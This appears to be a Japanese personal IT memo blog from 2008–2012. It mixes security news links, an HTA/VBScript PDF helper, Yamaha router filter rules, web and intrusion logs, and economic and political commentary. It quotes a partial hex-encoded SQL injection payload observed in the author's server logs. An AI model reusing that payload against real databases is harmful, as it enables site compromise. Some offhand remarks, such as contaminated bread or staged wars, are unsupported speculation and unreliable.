Microsoft Message Queueing(MSMQ) 【IDM】MSMQ を使って確実なユーザー登録を行う その1 〜 MSMQ って何してくれるの? http://blogs.technet.com/junichia/archive/2008/06/24/idm-msmq-1-msmq.aspx FIX: メッセージ キューに Windows 7 で、または Windows Server 2008 R2 では応答しなくなる可能性があります http://support.microsoft.com/kb/2028997 メッセージ キュー サービスは、メッセージ キューをホストするコンピューターを再起動した後メッセージ キュー トリガーでは、Windows 7 または Windows 2008 R2 のメッセージの処理を停止します。 http://support.microsoft.com/kb/2294419
IIS + SQL Server を狙った SQL インジェクション が流行ってるようですね。 最近は以下のコードの注入みたいで、よく飛んできます。 ';DeCLARE%20@S%20CHAR(4000); SET%20@S=CAST(0x4445434C4152452040542076 61726368617228323535292C4043207661726368 6172283430303029204445434C41524520546162 …削除 45205461626C655F437572736F72204445414C4C 4F43415445205461626C655F437572736F72 %20AS%20CHAR(4000));ExEC(@S); 何をやってるかは詳しく調べてませんけど、一般的な iframe+JavaScript でしょうね。 取り合えずサーバー側で保護するには URLScan 入れて Http.sys のチューニングで。 Webアプリ開発で一番重要視されなければいけない部分が、まだまだおそろかに、、、 依頼するほうも作成するほうも、勉強不足って事ですね。 最初に受け取ったデータの長さを確認してないだけのような気もしますけど...  影で PHP への無差別爆撃も始まっていたようで。   確認されているだけでも攻撃が毎分1.5件,PHPアプリ狙う攻撃が大量無差別型に   http://itpro.nikkeibp.co.jp/article/COLUMN/20081016/317141/ リンク先が .swf なスパムメールも増えてますね。これクリップボードの乗っ取り系でしょうね。 setClipboard() で 悪質 URL に誘導するタイプかな。IE だけじゃなく、Firefox や Opera もアウト。  クリップボードを乗っ取る悪質Flash広告が登場  http://slashdot.jp/security/article.pl?sid=08/08/21/230212  URLをコピペしたら悪質サイトに――乗っ取り被害が続出  http://www.itmedia.co.jp/enterprise/articles/0808/20/news033.html 偽のアンチウイルスソフト(ミスリーディングアプリケーション)サイトにでも繋げるんでしょうかね。 ↓だったみだいです。 偽のセキュリティ対策ソフトを買わないで、IPAが警戒呼び掛け http://www.itmedia.co.jp/enterprise/articles/0809/02/news085.html  中国向けサイトを狙ったSQLインジェクション攻撃  http://itpro.nikkeibp.co.jp/article/COLUMN/20080826/313473/  「SQLインジェクション」と呼ばれるサイバー攻撃はどのようなものか取材しました。  http://www.fnn-news.com/news/headlines/articles/CONN00142634.html  パスワードを盗むウイルスが急増、半数は「オンラインゲーム」を狙う  http://itpro.nikkeibp.co.jp/article/NEWS/20080829/313755/ 悪質なFlashリダイレクタ http://itpro.nikkeibp.co.jp/article/COLUMN/20080916/314817/ アドビ、Flash Playerの「クリック乗っ取り」対策を公表 http://itpro.nikkeibp.co.jp/article/NEWS/20081008/316444/ クッキーに隠されたSQLインジェクション、対策は? http://www.atmarkit.co.jp/fsecurity/column/kawaguchi/008.html  これで汚染されるサーバーは明らかに、手抜きされたコードが原因でしょう。  ちゃんと作成出来る会社に依頼&納品前の脆弱性チェックをしない方が悪いですね。  そもそも他に(アプライアンス含めて)頼りすぎてる気が…  自社作成アプリとして軽く作っている場合でも、コードの安全性とその寿命も考慮しないとね。  派遣会社で質が悪い所は、未経験者を研修1か月で送っていますしね。  広く浅くの間に合わせの知識では、自分たちの首を絞める事に…   分業によってスキルを失ったSEとプログラマ   http://el.jibun.atmarkit.co.jp/jibun/2008/10/se-9465.html    http://el.jibun.atmarkit.co.jp/karyu/2008/10/sepg1-acb2.html    http://el.jibun.atmarkit.co.jp/karyu/2008/10/sepg2-0e2d.html インターネット規模の中間者攻撃が明らかに--BGPの信頼性に問題 http://japan.cnet.com/news/sec/story/0,2000056024,20382238,00.htm WEPは一瞬で解読――ニンテンドーDSはどうなる http://www.itmedia.co.jp/news/articles/0810/17/news083.html  MAC アドレスが偽装されるって事を知らない人が多いんでしょう。  ルーターとか普通に変更出来るんですけどね…  「WEPを数秒で解読」報道を受け、総務省も注意喚起  http://internet.watch.impress.co.jp/cda/news/2008/10/21/21258.html
パスワード付きの PDF ファイル。 開く度にパスワード求められるのと、サーバーに送信される(インターネット端末じゃないと駄目)だから、なんとかならない? って相談を受けた。一つ開いておけば違うファイルを開いても聞かれ無いから、誤って消さないように隠せない?って話。 セキュリティ的にどうよ?って話は IT 中心では無い業界の人には無縁。 .hta を作成して IE を起動し、その中で PDF を開いて隠せば? という事で簡単なサンプル作成。 <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=Shift_JIS"> <TITLE>PDF常駐アプリ</TITLE> <HTA:APPLICATION APPLICATIONNAME = "HTA_Sample" BORDER = "dialog" BORDERSTYLE = "normal" CAPTION = "yes" CONTEXTMENU = "no" ICON = "Estelle.ico" ID = "oCheck" INNERBORDER = "no" MAXIMIZEBUTTON = "no" MINIMIZEBUTTON = "yes" NAVIGABLE = "yes" SCROLL = "no" SCROLLFLAT = "yes" SELECTION = "no" SHOWINTASKBAR = "yes" SINGLEINSTANCE = "no" SYSMENU = "yes" VERSION = "1.0.0" WINDOWSTATE = "normal" /> </HEAD> <STYLE> BODY { background: #CCC; } </STYLE> <SCRIPT Language="VBScript"> Option Explicit Dim ie Dim element ' Application開始時イベント Sub Window_OnLoad Window.ResizeTo 320,240 cmdIeOpen.value = "表示" cmdIeVisible.value = "隠す" cmdClose.value = "閉じる" End Sub Sub cmdIeOpen_OnClick On Error Resume Next If isObject(ie) = False Then Set ie=CreateObject("InternetExplorer.Application") End If ie.Navigate("about:blank") ie.Document.open ie.Document.write msg.InnerHTML ie.Document.close ie.Visible=True End Sub Sub cmdIeVisible_OnClick If isObject(ie) Then ie.Visible = False End If End Sub '閉じるボタンのクリックイベント Sub cmdClose_OnClick Window.Close End Sub </SCRIPT> <BODY bgcolor="#CCCCCC" onLoad="VBScript:Window.ResizeTo 320,240"> <P> PDF ファイルを IE を使って開きます。<br> 非表示の状態でこのアプリを終了した場合は、タスクマネージャーから IE を終了する必要があります。<br> <INPUT type="button" name="cmdIeOpen"> <INPUT type="button" name="cmdIeVisible"> </P> <P><INPUT type="button" name="cmdClose"></P> <!-- PDF を開くためのエレメント --> <div id="msg" style="display:none;"> <embed src='./sample.pdf' width='100%' height='100%'></embed> </div> <!-- ここまで --> </BODY> </HTML> hta 作成時の参考サイト http://tuka.s12.xrea.com/index.xcg?p=HTA .hta を終了して、パスワード付きの PFD を開き閉じた後に再度開くと、又パスワード聞かれるらしいから微妙。 それじゃ、タスクトレイにでも入れておいたら?って事で。。。 最小化時にタスクトレイに入るアプリ探して終了。(たぶん)  あー、hta は、Wscript.Echo や Wscript.Sleep などのコマンドが使えないんだったっけ。  http://www.microsoft.com/japan/technet/scriptcenter/resources/qanda/oct05/hey1031.mspx wmi 使えば Sleep モドキは可能かな。 VISTA + IE7 の場合、Navigate や Navigate2 で開くと複数開いてくるんですよねぇ。 保護モードを解除すると、ちゃんと動くみたいですけど。 それを調べてたら新しいウインドやら、タブで開くってのがありました。  Const NAVOPENINNEWWINDOW = &H1  Const NAVOPENINNEWTAB = &H0800  Const NAVOPENINBACKGROUNDTAB = &H1000  ie.Navigate2 URL, NAVOPENINNEWWINDOW + NAVOPENINNEWTAB  こんな感じ。   Vistaの保護モードで、CreateObject("InternetExplorer.Application")を使う。   http://scripting.cocolog-nifty.com/blog/2008/06/vistacreateobje_2574.html 委託先が信用できない http://itpro.nikkeibp.co.jp/article/NC/20080825/313380/?ST=NC 「添付ファイルはパスワード付き暗号化」でいいのか http://itpro.nikkeibp.co.jp/article/OPINION/20080901/313857/ --------------------------------------------------------------------- 実行ファイルのパスを取得、指定ファイルの存在確認(.hta VBScript) Dim objFS, strFLD Set objFS = CreateObject("Scripting.FileSystemObject") strFLD = objFS.GetFolder(".") '実行ファイルのパス取得 If flExpar("config.ini") Then '「config.ini」が存在するか確認 '存在する場合の処理 Else msgbox "初期設定ファイルが見つかりませんでした。" Window.Close End If Function flExpar(fname) Dim fn fn= objFS.BuildPath(strFLD,fname) If objFS.FileExists(fn) Then flExpar = True Else flExpar = False End If End Function ---------------------------------------------------------------------
「保護期間よりも問題は違法コピー」ドワンゴ川上会長 http://internet.watch.impress.co.jp/cda/news/2008/08/28/20678.html フレッツスクエアみたいに閉鎖的空間を作って、さらにアンチウイルス製品みたいに3台まで入れれます。みたいな? 接続先を数セッション張れるなら、実現できそうだけども。  総務省、著作権料を気にせず既存の映像や音楽を自由に加工できる空間をインターネット上に創設へ  http://gigazine.net/index.php?/news/comments/20080825_cyber_free/
Windows Home Server 日本語版 http://www.watch.impress.co.jp/akiba/hotline/20080830/etc_msev0.html 一般受けすると構築サービスとか出てきたりするのかな。 将来的にはアプリを全部詰め込んで、PC端末はシンクライアント アプリは必要に応じて呼び出す、、、なんてのが理想かな。  Citrixの掲げる仮想化戦略が結実 “デスクトップの仮想化“で実現するシンクライアントの最終形  http://special.nikkeibp.co.jp/ts/article/0h0i/100942/  今使っているクライアント端末はイメージ化してサーバーにアップ  専用のBootCDから接続する、ってサービスもそのうち出てきそうですね。  日本HP,3万円を切ったシンクライアント端末を投入  http://itpro.nikkeibp.co.jp/article/NEWS/20080925/315483/ マイクロソフト、Windowsのクラウド版「Windows Azure」を正式発表 http://japan.cnet.com/news/ent/story/0,2000056022,20382661,00.htm?ref=rss 発表された… ユーザーに暗黙の管理負担を強いるPCの使い方を変える――マイクロソフト (1/2) http://www.itmedia.co.jp/enterprise/articles/0810/29/news011.html が、定着するには5年は必要でしょうね… 以前勤めていた会社では、LANに2回線(光とYBB)使ってDHCPで優先順位つけて運用していましたけど そこまでする会社はまだ少ないでしょうね… バブルが崩壊した後に起きること http://www.nikkeibp.co.jp/it/article/COLUMN/20081026/317777/ デル、企業向けデスクトップでセキュリティ機能を強化 http://www.itmedia.co.jp/enterprise/articles/0810/30/news041.html 今後はデスクトップアプリがターゲット。 ガジェットなども注意が必要でしょうね。  OSよりアプリケーションへの攻撃が増加、MSがセキュリティ報告書  http://internet.watch.impress.co.jp/cda/news/2008/11/04/21400.html [PDC 2008]Windows 7ではリモート・デスクトップを強化,動画やゲームも再生可能に http://itpro.nikkeibp.co.jp/article/NEWS/20081031/318233/ Microsoft、仮想化をプライベートクラウドの基盤と位置付け http://techtarget.itmedia.co.jp/tt/news/0811/12/news06.html メール用パスワードの復旧サービス〜パスワード破りの新潮流? http://itpro.nikkeibp.co.jp/article/COLUMN/20081111/319058/?ST=security&P=1 次はメールサーバは自前で用意するのが主流になり 無料サービスは使わないって流れになるんでしょうかねー
不明なシステムデバイス デュアル CPU で組むと、一つ見つからないのかな? Intel(R) 631xESB/6321 ESB LPC Interface Controller でした。 ちなみに、DELL の SC1430
「日本人が優しすぎるから」――ニコ動で“育つ”香港の歌姫 (1/3) http://www.itmedia.co.jp/news/articles/0809/05/news080.html プロより歌が上手い人、いるもんですねぇ。 いい話でした。 「工業用糊に限り販売」 農水省の説明は大ウソだった http://www.j-cast.com/2008/09/11026863.html 最近話題の事故米転用はバイオテロみたいな物ですねぇ。(米の基準値だけやたら厳しく設定されているのも・・・) 役人やってる犯罪者を何とかしないと、日本はちっとも良くなりませんね。 福田総理が辞任するのも判りますよ。 こういう話題の裏には、もっと大きなネタの存在を隠蔽する目的もあるのかも。 社保庁の年金問題が消えかけていますし・・・ そういえば半年〜1年程前だったか、毎日食べてる食パンの味が妙に違う時が3か月程ありました。 なんだか化粧品っぽい香りが口一杯に広がって嫌な感じでしたが、、、 今思えば、これもチャイナリスクだったのかも知れませんね。 あやうく殺されかけてたのかも。。。 手作りを1斤買った方が味も質も安心感も全く違いますね。(値段も倍近く変わりますけど…) 原材料に中国産を使って大量生産している製品の品質管理ってどうなってるんでしょうかね。 ちゃんと出来上がった物の味の確認してるんでしょうかね…
喫茶店のテーブルゲーム  昔は良く見かけましたが、、、マージャン等で役満でコーヒーチケットとか。。。  IT 化が進んだことですし、応用して新たな広告市場に出来そうな気がしませんかね。  携帯と連動とかも面白そうです。。。ネットカフェとは違う方向で・・・   メディア化するポータルが瀕死の雑誌を飲み込もうとしている   http://japan.cnet.com/column/pers/story/0,2000055923,20381140,00.htm   EXOdeskは貧乏人のためのMicrosoft Surface―マルチタッチジェスチャーもちゃんとサポートして1299ドル(ビデオ)   http://jp.techcrunch.com/archives/20111121exodesk/ 間違っているオバマが勝ち、正しいマケインが負けそうな件 http://blogpal.seesaa.net/article/107406416.html  石油産業と軍事産業に癒着がある方が勝つのですよ。 今まさに瓦解する市場原理主義 http://www.nikkeibp.co.jp/sj/2/column/o/154/  既に始まっている食糧危機をどうするか、、、  次に流動資金が流れるのは、そっちじゃないでしょうかね。  このまだと、日本は兵糧攻めに合うのでは…   世界同時食糧危機 第1回 アメリカ依存の食が破綻する日 (仮)   http://www.nhk.or.jp/special/onair/081017.html 東京円:続伸 1ドル97円台、ユーロも一時124円台 http://mainichi.jp/select/today/news/20081023k0000e020017000c.html ファンドにしてやれている韓国とアイスランド、今後どうなるんでしょうかね。 アイスランドは、魚で返すとか言い出しそう。 「禁じ手」を使わざるを得ない米国 / SAFETY JAPAN [大前 研一氏] / 日経BP社 http://www.nikkeibp.co.jp/sj/2/column/a/158/index2.html 戦争起こして世界人口減らしにきますよ… 地球の人口は 66億7千6百万人で1分間に140人増えている(在ってる?) 中国とインドをなんとかしないと穀物食い潰される訳ですけど。 「VANITY FAIR」誌が発表した米国資産家の損失額ランキング  1.シェルドン・アデルソン(ラスベガスのカジノ王)   249億米ドル / 約2兆4900億円  2.ウォルトン一族(ウォルマートの創業者一族)   211億米ドル / 約2兆1100億円  3.ウォーレン・バフェット(有名な投資家)   163億米ドル / 約1兆6300億円  4.セルゲイ・ブリン、ラリー・ペイジ(Google社の共同創業者)   121億米ドル / 1兆2100億円  5.ビル・ゲイツ(マイクロソフト社の創業者)   120億米ドル / 約1兆2000億円 韓国株式市場、政府の対策も効果なし(上) http://www.chosunonline.com/article/20081023000018 韓国、ロシアは、今後どうなるんでしょうね。 金融危機は「勝負の時」 http://trendy.nikkeibp.co.jp/article/column/20081105/1020624/ 音楽産業(音楽の神様だった小室哲哉氏)もそうですけど、過去の偉業が大きすぎた事により時代の変化に対応出来ていませんよね。 TV も変わるタイミングを完全に逃しちゃいましたので周りから変えていくしか無いですね。(Wiiとか頑張ってますよね) 今のくだらない放送しかしないTVを見ているのは、やる事の無い人だけって気付いているのでしょうかね。 とは言え、嘘の情報を真実に変える力は健在のようですけど。。。 トヨタ奥田氏「厚労省たたきは異常。マスコミに報復も」 http://www.asahi.com/national/update/1112/TKY200811120346.html ご立腹のようで。 頭の固い年寄りの影響力が強すぎるんでしょう、どの業界も。 まずは消費者が、もう少し賢くならないといけませんよね。良識も常識もあったもんじゃない。 日テレ・テレ東が三十数年ぶり赤字 CM落ち込む http://www.asahi.com/business/update/1113/TKY200811130264.html 予算削減でさらに品質劣化確定ですか。
長音記号 慣れてないので、まだ書き漏れますねぇ。。。  マイクロソフト製品ならびにサービスにおける外来語カタカナ用語末尾の長音表記の変更について  http://www.microsoft.com/japan/presspass/detail.aspx?newsid=3491  マイクロソフト ランゲージ ポータル  http://www.microsoft.com/language/ja/jp/download.mspx
会社が倒産して早3か月が過ぎました… Oracle と JAVA の技術者、.NET 化する為の開発者を求めている会社が多いです。 Oracle は脆弱性だらけでパッチが当てられないイメージなのですけど、世の中 Oracle なんですかね。 自社製品を持っていない受注開発のみの会社も、将来の成長は余り望めそうに無いように思えますし 未経験者歓迎と書かれている会社は、安い賃金でロボットみたいな人材を求めていますし。 それでは7Kで嫌煙されても仕方ないですね。 IT企業では無い店舗を複数持っている企業では、末端までPCの取り扱いの教育をされてないのが現状ですし 情報漏えいを起こした場合に会社が傾くという事を判って無いようで、そういう会社は間違いなく自滅しますね。 店舗ばかり増やしてたら。きっとPCが企業の基幹システムとして機能するまでは、重要視されないのでしょう… だから派遣会社がウハウハなんでしょうけども。 さて、生活に困らなくなる前に新しい会社が見つかるでしょうかねぇ。  世界恐慌時、アメリカの株価は90%まで下落したそうですが  御社がその状態になった時、危機管理は出来ていますか?  って質問しても、答えられない企業ばかりなんです…  (入社して数年で倒産は勘弁。未払い賃金全額戻ってこないですし) 日本のエンジニアよ、40歳で使い捨てられてもいいのか? 日本のIT業界を根底から変えるヘッドウォータースにインタビュー http://gigazine.net/index.php?/news/comments/20081021_headwaters/  今の日本に未来が無い事は経営者の皆さんはご存知のはず… 面白そうな問題が下の方に書かれていますね。  1は考察力、2は暗号化、3は最適化ですかね。  後からやってみよう…  1,3はスグ判りますね。  深読みするなら、3は人が行っているので差し込む場所が既に特定されているって事でしょうか。  2は、数字と文字のテーブルを作れば結果はスグですね。  地元でこういう会社があると良いのだけど。。。  ちなみに1は、4.3.3 何故かは自分で考えろと。6.3.2 じゃないよ。 第17回 年収400万円と600万円で差が出る職務経歴書 http://jibun.atmarkit.co.jp/lemb01/rensai/kktj17/kktj01.html 技術職を失ったときに試したい14のこと--経済危機を乗り切るために http://japan.cnet.com/special/story/0,2000056049,20382629,00.htm ITSSは、いまどう使われているのか http://www.atmarkit.co.jp/im/cits/serial/ithr/01/01.html プログラマーを採用する際に重視すべき10の資質 http://japan.zdnet.com/sp/feature/07tenthings/story/0,3800082984,20382969,00.htm 今日、元同僚と話をする機会がありました。 デスマーチ状態の会社に入ったようで・・・  納期とは遅れるものだ  http://www.atmarkit.co.jp/im/cits/serial/murphy/12/01.html  で言う所の「努力しています」「遅れています」辺りみたい。  大変そうだ。   占いはね、占う者と占われる者との間で行われるやり取りだから…   知りたいと思っている者には、占い師は答えなくてはならない。   己の出来る限り全ての力で、決して疎かにしてはならない。   どの職業でもそれは同じ事だけど   目に見えない、形に出来ない事だからって、嘘をついたり   出来ない事をさも出来る様に振舞うのは、本気の相手にも失礼よ…   by XXXHOLiC これからの時代、安かろう悪かろうビジネスはもう通用しないと思われるがいかに。 社員が壊れる【1】“抜け殻”正社員、派遣・請負依存経営のツケ http://business.nikkeibp.co.jp/article/person/20081027/175268/ 第1回■ぜい弱性がなくならない本当の理由(わけ) http://itpro.nikkeibp.co.jp/article/COLUMN/20081110/318939/  結局のところ目先の利益を優先しすぎた反動ですね。  宅配業者をコロコロ変えてる企業も、顧客の事を全く考えてませんよね。 「ヨドバシ・ドット・コム」がリニューアル直後から表示が遅すぎて激重になる大規模障害が発生、一体何が起きているのか? http://gigazine.net/index.php?/news/comments/20081029_yodobashi_slow/ ヨドバシドットコムのリニューアル失敗から学ぶべきたったひとつのこと http://neta.ywcafe.net/000938.html 原因は、画像を動的に表示させているサーバのTCPコネクション不足ですかね。 それなら負荷分散クラスタで数台増やせば、直りそうな予感。 九十九電機、民事再生法の適用を申請 http://slashdot.jp/article.pl?sid=08/10/30/0330208 ここ数年、景気悪そうな雰囲気ありましたからねぇ。 ここも貸し渋りで、、、ですね。 米国の失業者1ヶ月に24万人増加…ばくち資本主義から早く脱却しよう… http://blog.goo.ne.jp/tokyodo-2005/e/b3adfa2d25fa7c28d7cadb669287d3b6 株価が90%まで下落しても平気な資金力がある会社ってどれ位あるんだろう。。。 名古屋で夢破れ、職失い… 支援施設、全国から入所者 http://www.asahi.com/national/update/1114/NGY200811130022.html 立場が違えば考え方も変わってきますが 今後もっと悲惨な事態になるでしょうし 弱者が虐げられる行為に歯止めは… 次は口座預金の保障をしないって事になるのでは。。。 SFCG、貸し剥がしの実態 http://www.nikkeibp.co.jp/article/column/20081113/112198/ 政府、銀行、ファンドがグルになってる訳ですから止まりません。。。 利によって行えば怨み多し。 やっぱり、年金より生活保護のが得じゃん http://d.hatena.ne.jp/yumyum2/20081117/p3 よく利用させて頂いてる薬局のオーナーも 働いている私達より生活保護を受けている人の方が いい生活をしている、納得いかない。 とぼやいていたのを思い出した… あなたも「頭の中身が昭和時代」の管理職?“タダ乗り粘土層”に対する不満の原因と対策 http://diamond.jp/articles/-/10169 職場で女性に嫌われるタダ乗り社員たち――。“粘土層”のオジサンや敵が多い女性は要注意! http://diamond.jp/articles/-/10023 男性社員を困らせる「女性タダ乗り社員」たち――。職場のドンや競争意識が過剰なタイプは要注意 http://diamond.jp/articles/-/10361 雇用体系が変り会社の性質も各社員の考え方も変化していますからねぇ。 物事の変化を求めない限り次の進化はありえないのですが、その環境に習慣化が出来てしまっている 状況は、なかなか打破出来る物ではないですね。新しい環境は拒否する人の方が多いのでは・・・
腕時計。  面接の人って結構見るんですよね。  手首が痛くなるから着けないのですが、面接の時は在った方が印象が良いみたい。  どうせつけるなら技術屋さんは、24時間盤のフォルティスが便利かも。(10年使うと、1日30秒程度狂うらしいけど)  ↓こんなの。  http://www.fortis.jp/fliegerclassic.html  フォルティスは5年程前から流行りだしています。  これ、ワールドカップでアルゼンチンの監督、マラドーナが両腕にはめてたような・・・自国と現地時間用かな? 新・10分でわかる。株式会社の作り方 http://blog.kndb.jp/president/2008/10/10.php 交際費400万円(年間)が自由に使える、それが「スーパーサラリーマン化」計画 http://moneyzine.jp/article/detail/57311 優秀な IT 人材の確保:逆面接(1/3) http://japan.internet.com/busnews/20110221/6.html
eSATAリムーバブルケース の電源が突然死亡した… さすがに電源の予備は持ってないや。。。 http://www.rexpccard.co.jp/products/subpage/sadk5es.html これ。 HDDが1台巻き込まれ故障。さらにHDDが不安定(転送速度が 2MB/S 辺りまで下がって怪しかった) 原因はeSATAカードに在った。5連のドライブ全部昇天しちゃったじゃん。 今後は iSCSI のが良いのかも。 続・また同じケースの電源が死亡したみたい。(2010.6.17) 今回は良い電源に交換してたから HDD は巻き込まれなかった。 セーフモードみたいなのが働いて自動で落ちるみたい。 前回壊れたのいつだったっけ、、、 また調子が悪くなった。(2012.1.20) eSATA の状態が怪しいと Windows7 でも OS が半フリーズ状態になるのは、何とかならないのでしょうかね。 今回は、ケーブルの断線が原因。読み込みは出来ても書き込みが正しく出来ず、HDD の 故障みたいな現象が発生。 PCをよく触る場合、eSATA ケーブルは断線しにくい形状の物にしておくと、変なトラブルが減ります。 半フリーズするので、当然通信も切断されます。。。 SeagateのBarracuda 7200.11などにアクセス不能になる不具合 http://pc.watch.impress.co.jp/docs/2009/0119/seagate.htm YAMAHAのRTX1200ゲット。http://netvolante.jp/products/rtx1200/index.html 不正アクセス検知の検知回数 種別   名称    検知回数 IPヘッダ Land attack 15015 2008/11/07 02:07:49 Land attack 61.194.16.124 61.194.16.124 2008/11/07 02:09:57 Land attack 61.194.16.124 61.194.16.124 2008/11/07 02:10:58 Land attack 61.194.16.124 61.194.16.124 早速デスか。 フィルターのかけ方がイマイチ判らん… 暫くは、たまにアクセス出来なくなるかも。 とりあえず、お約束ルール LAN1: LAN LAN2: FTTH, flets-square http://www.rtpro.yamaha.co.jp/RT/FAQ/PPPoE/multi-session-example.html LAN3: DMZ http://netvolante.jp/solution/int/case4b.html -- ip filter source-route on ip filter directed-broadcast on ip filter 1010 reject * * udp,tcp 135 * ip filter 1011 reject * * udp,tcp * 135 ip filter 1012 reject * * udp,tcp netbios_ns-netbios_ssn * ※137〜139 まで ip filter 1013 reject * * udp,tcp * netbios_ns-netbios_ssn ※137〜139 まで ip filter 1014 reject * * udp,tcp 445 * ip filter 1015 reject * * udp,tcp * 445 ip filter 1020 reject 192.168.x.0/24 * ip filter 1030 pass * 192.168.x.0/24 icmp ip filter 2000 reject * * ip filter 3000 pass * * ip filter dynamic 500 * * tcp ip filter dynamic 501 * * udp ip lan3 secure filter in 2000 ip lan3 secure filter out 3000 dynamic 500 501 pp select 1 ip pp secure filter in 1020 1030 2000 ip pp secure filter out 1010 1011 1012 1013 1014 1015 3000 dynamic 500 501 pp enable 1 -- 後は DMZ のポート空け。 ※IPアドレスのフィルタは、10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16 で割り当てられているグローバル IP も  含めて設定しておいた方がよいです。インターネット側からルータを通ってこの IP が来る事はありません。 次は、統合脅威管理のアプライアンスが欲しいけど、先に就職先を見つけねば…  米SonicWALL、3Gデータ通信カードに対応した小規模企業向けUTM製品「SonicWALL NSA 240」  http://www.rbbtoday.com/news/20081105/55483.html 今朝はWebサーバーのログにこんなのが。 2008/11/07 7:45:01 static.108.75.46.78.clients.your-server.de リファラーを偽装して http://www.netdive.jp/memo.asp からきた事にしてますね。 /wedding-cocktail-favor-ct20122.html /wedding-coffee-favor-dswc0126.html /cappunccino-wedding-favors-dswca5119.html /cappunccino-wedding-favors-dswca5118.html /snowflake-boxes-dswb1010.html /ourguarantee.html /thankyounotes.html /candyfood.html /americanbridal-editors-picks.html /place-card-holder-dska27023na.html /wedding-mints-favors-dsmints44.html /personalized-chocolate-favors-dsdd4210121.html /wedding-cocktail-favor-ct20120.html /coaster-wedding-favors.html /cocoa-wedding-favors-dswco50121.html /personalized-notebook-favors-dseb1088.html /personalized-chocolate-favors-dsmbw35.html /whats-hot.html /snowflake-coaster-dska27010.html /bookmark-wedding-favors-dsfc6472.html /wine-wedding-favors.html /tea-favor-wt0130.html /shopbyprice.html /uniquefavors.html /wedding-coffee-favor-dswc0124.html /scented-pine-cone-dswb1016.html /golf-wedding-favors.html /candle-wedding-favors-dsfc3992.html /seasonal-wedding-favors.html /newsletter.html /testimonials.html /tea-favor-wt0128.html /candle-wedding-favors-dsfc3991.html /cocoa-wedding-favors-dswco50120.html /tea-favor-wt0124.html /pen.html /ceres.html /tea-favor-wt0129.html /weseof.html /cappuccino-wedding-favors-dswcapm02.html /snowflake-candle-dsfc4137.html /bridgif.html /plachol.html /bookmark-wedding-favors-dsfc6478.html /wine-stopper-wedding-favors-dsfc1913.html /weddingbubbles.html /snowflake-bookmark-favors-dska14043na.html /personalized-chocolate-favors-dsdd4210126.html /bridac.html /brgopr.html /snowflake-favor-boxes-dska28080na.html /secure.html /wedding-cake-candle-favors-dska20065bl.html /brshac.html /place-card-holders-wedding-favors-dsfc5365.html /scented-pine-cone-dswb1020.html /bottle-stopper-wedding-favors-dsfc1926.html /gifts.html /snow-cone-bath-salt-dswb1011.html /christmas-tree-soaps-dswb1019.html /cappunccino-wedding-favors-dswca5122.html /pine-cone-sachets-dswb1018.html /beach-wedding-favors.html /personalized-notebook-favors-dseb2053.html /newproducts.html /pine-cone-pyramid-boxes-dswb1017.html /fashionjewelry1.html /cappunccino-wedding-favors-dswca5120.html /engraving-information.html /tabdec.html /practical-wedding-favors.html /personalized-cookie-mix-dseb2058.html /garden-flower-favors.html /best-sellers.html /tea-favor-wt0126.html /personalized-muffin-mix-dseb2057.html /personalized-mint-tins-favors-dseb2052.html /discount-wedding-favors.html /aboutus.html /bottle-stopper-wedding-favors-dska11039na.html /wedding-coffee-favor-dswc0123.html /place-card-holder-favors-dska14033na.html /ab-site-map.html /invitations.html /asiantheme.html /personalized-favor-tags.html /wedding-coffee-favor-dswc0122.html /cldiit.html /personalized-chocolate-favors-dsdd4210123.html /embroidery-information.html /wedding-cocktail-favor-ct20117.html /tea-favor-wt0125.html /shot-glass-dsws8240.html /wedres1.html /bridal-spaces.html /descol.html /candle-wedding-favors.html /inexpensive-wedding-favors.html /personalized-cocoa-favors-dseb2054.html /fall-wedding-favors.html /personalized-bookmark-favors-dseb1086.html /tea-lights-wedding-favors-dska20070.html /pink-favors-gifts.html /snowflake-takeout-boxes-dswb1015.html /snowflake-wine-stopper-dsws6096.html /bathsoapfavors.html /photo-coasters-favors-dska27027bl.html /pe.html /cocoa-wedding-favors-dswco50118.html /wedding-cocktail-favor-ct20118.html /key-chains-wedding-favors-dsfc6477.html /placecard-holders-dsws6071.html /cocoa-wedding-favors-dswco50122.html /silver-wedding-favors.html /tea-favor-wt0127.html /contact-us.html /cappunccino-wedding-favors-dswca5121.html /wedding-cocktail-favor-ct20121.html /cocoa-wedding-favors-dswco50119.html /holiday-favor-boxes-dswb1013.html /wedding-cocktail-favor-ct20116.html /cocoa-wedding-favors-dswcopm02.html /personalized-candy-jars-favors-dseb2051.html /reces.html /shipin.html /winter-wedding-favors.html /theme-weddings.html /99-cent-wedding-favors.html /merry-mitten-sachets-dswb1012.html /gel-candle-favors-dska20068na.html /wedsup.html /bells.html /link-to-us.html /weddingcameras.html /snowflake-soaps-dswb1014.html /groomgif.html /wedding-coffee-favor-dswc0121.html /personalized-tape-measure-dseb1075.html /favors-by-colors.html /weddingfavors.html /something-blue.html /wedding-cocktail-favor-ct20119.html /gift-registry.html
2008.12.13時点の拒絶IP一覧 189.0.0.0/8 200.0.0.0/8 201.0.0.0/8 85.138.176.0-85.138.255.255 上記URLフィルターをかけたら、自分のサイトがブロックされた… ひでぇ仕様だな。 新しいルーターが発表されましたね。  ヤマハがFWルータにトレンドマイクロ技術を搭載、Webからの脅威へ対応  http://enterprise.watch.impress.co.jp/cda/security/2008/12/16/14545.html?ref=rss ヤマハルーター運用設定マニュアル RTX1200/ SRT100のGUI&コマンドラインの実践 (大型本) ってのを買いました。 Windows Server 2008 実践ガイド (大型本) にも YAMAHA のルーターの設定が少しかかれています。 YAMAHA の ルーターは Wake On LAN に対応しているようなのでそのうち調べる・・・ 管理者権限で wol send lan1 00:00:00:00:00:00<起動したい PC の MAC アドレス で OK みたい。  RTX1200 ファーム   Rev.10.01.08(Dec. 2008)   http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_08.txt   Rev.10.01.11(Apr. 2009)   http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_11.txt   Rev.10.01.16(Oct. 2009)   http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_16.txt   ↑再起動がかかるバグが残ってるようで・・・   Rev.10.01.22 (Apr. 2010)   http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_22.txt   Rev.10.01.24 (Nov. 2010)   http://www.rtpro.yamaha.co.jp/RT/docs/relnote/Rev.10.01/relnote_10_01_24.txt telnet(1)――ホストの遠隔操作に使う 